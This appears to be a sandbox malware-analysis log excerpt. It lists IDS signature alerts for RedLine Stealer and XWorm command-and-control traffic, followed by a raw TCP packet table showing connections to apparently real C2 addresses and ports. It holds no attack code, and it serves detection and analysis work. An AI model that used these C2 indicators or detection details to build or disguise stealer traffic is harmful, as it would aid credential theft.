2024-11-26T09:01:30.772529+0100	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:31.227963+0100	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	212.162.149.53	36014	192.168.2.5	49734	TCP
2024-11-26T09:01:31.980363+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:31.984968+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49710	212.162.149.53	7071	TCP
2024-11-26T09:01:34.528254+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:36.249348+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:37.526601+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:37.817320+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	212.162.149.53	36014	192.168.2.5	49734	TCP
2024-11-26T09:01:38.499713+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:39.530589+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:39.896632+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:40.346836+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:40.569564+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:41.423077+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:41.763789+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	49710	212.162.149.53	7071	TCP
2024-11-26T09:01:41.812484+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:42.583965+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:42.622008+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:43.100875+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:43.563814+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:44.198812+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:44.544044+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:44.544044+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:44.735926+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:44.923125+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:44.931572+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:45.337776+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:45.413568+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.050948+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.465474+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:46.774347+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:47.772433+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:47.777165+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:48.127639+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:48.143931+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:49.233369+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:49.235613+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:49.595276+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:50.793867+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:51.951541+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:51.965830+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.049563+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.169983+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:01:52.399957+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:52.964327+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:53.391596+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:01:54.753183+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:01:54.754657+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49710	212.162.149.53	7071	TCP
2024-11-26T09:01:58.043889+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	193.122.6.168	80	TCP
2024-11-26T09:01:59.087190+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:01.314825+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:01.318986+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:01.761812+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:01.764739+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:02:01.764739+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49710	TCP
2024-11-26T09:02:01.828037+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49707	212.162.149.53	36014	TCP
2024-11-26T09:02:02.222441+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:04.807481+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49734	212.162.149.53	36014	TCP
2024-11-26T09:02:43.171081+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:02:43.187425+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:02:54.023755+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:02:54.032615+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:13.214721+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:13.214721+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:15.312066+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:15.512868+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:15.514337+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:26.044817+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:26.051684+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:30.731931+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:30.731931+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.266943+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.677985+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.681251+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:49.826438+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:49.830744+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:50.005725+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:52.395538+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:52.397325+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:03:58.781455+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:03:58.783309+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:11.737829+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:11.737829+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:12.024879+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:12.225835+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:12.231790+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:12.354493+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:17.911208+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:17.913650+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:19.187123+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:19.188935+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:22.262980+0100	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:23.871029+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:24.634903+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:24.636972+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:27.867580+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:27.926087+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:28.917832+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:28.920246+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:29.119828+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:29.121466+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:31.067387+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:31.069350+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:51.862259+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:51.862259+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:52.062573+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:52.265188+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:52.385460+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:52.385517+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:52.464744+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:55.286763+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.486652+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.488179+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:04:55.609365+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:04:55.611299+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:09.499036+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.499036+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.700077+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:09.903577+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:16.213174+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:16.214897+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP
2024-11-26T09:05:24.089816+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	212.162.149.53	7071	192.168.2.5	49829	TCP
2024-11-26T09:05:24.090869+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49829	212.162.149.53	7071	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:01:13.720232010 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:13.840254068 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:13.840676069 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:13.850675106 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:13.971429110 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:16.647425890 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:16.683212042 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:16.803324938 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:17.799588919 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:17.919671059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:17.919742107 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:18.190179110 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:18.311347008 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:20.082140923 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:20.200114012 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:23.947462082 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.947582006 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.947602034 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.947639942 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:23.947705984 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.947719097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.947758913 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:23.985243082 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.985265970 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.985276937 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.985342026 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.985354900 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:23.985372066 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:23.985418081 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.067965031 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.068017006 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.068113089 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.139121056 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.139138937 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.139234066 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.143002033 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.143134117 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.143207073 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.151405096 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.151529074 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.151588917 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.159879923 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.159991980 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.160056114 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.168247938 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.168343067 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.168411970 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.177097082 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.177434921 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.177521944 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.182833910 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.184354067 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.184397936 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.184436083 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.192739010 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.192809105 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.192887068 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.201121092 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.201255083 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.201325893 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.209553957 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.209659100 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.209733963 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.217967033 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.218112946 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.260479927 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.260603905 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.260679007 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.331063032 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.331216097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.331270933 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.333019018 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:24.387603045 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:24.627475023 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:24.747472048 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:24.748883009 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:24.749298096 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:24.869164944 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:25.269084930 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:25.388989925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:26.061764002 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:26.067321062 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:26.187252045 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:26.482033014 CET	80	49717	193.122.6.168	192.168.2.5
Nov 26, 2024 09:01:26.528249979 CET	49717	80	192.168.2.5	193.122.6.168
Nov 26, 2024 09:01:26.628201008 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:26.628248930 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:26.628359079 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:26.635756016 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:26.635770082 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:27.617254019 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.617417097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.617480040 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.619220018 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.619350910 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.619429111 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.623279095 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.623415947 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.623469114 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.627223015 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.627361059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.627407074 CET	49710	7071	192.168.2.5	212.162.149.53
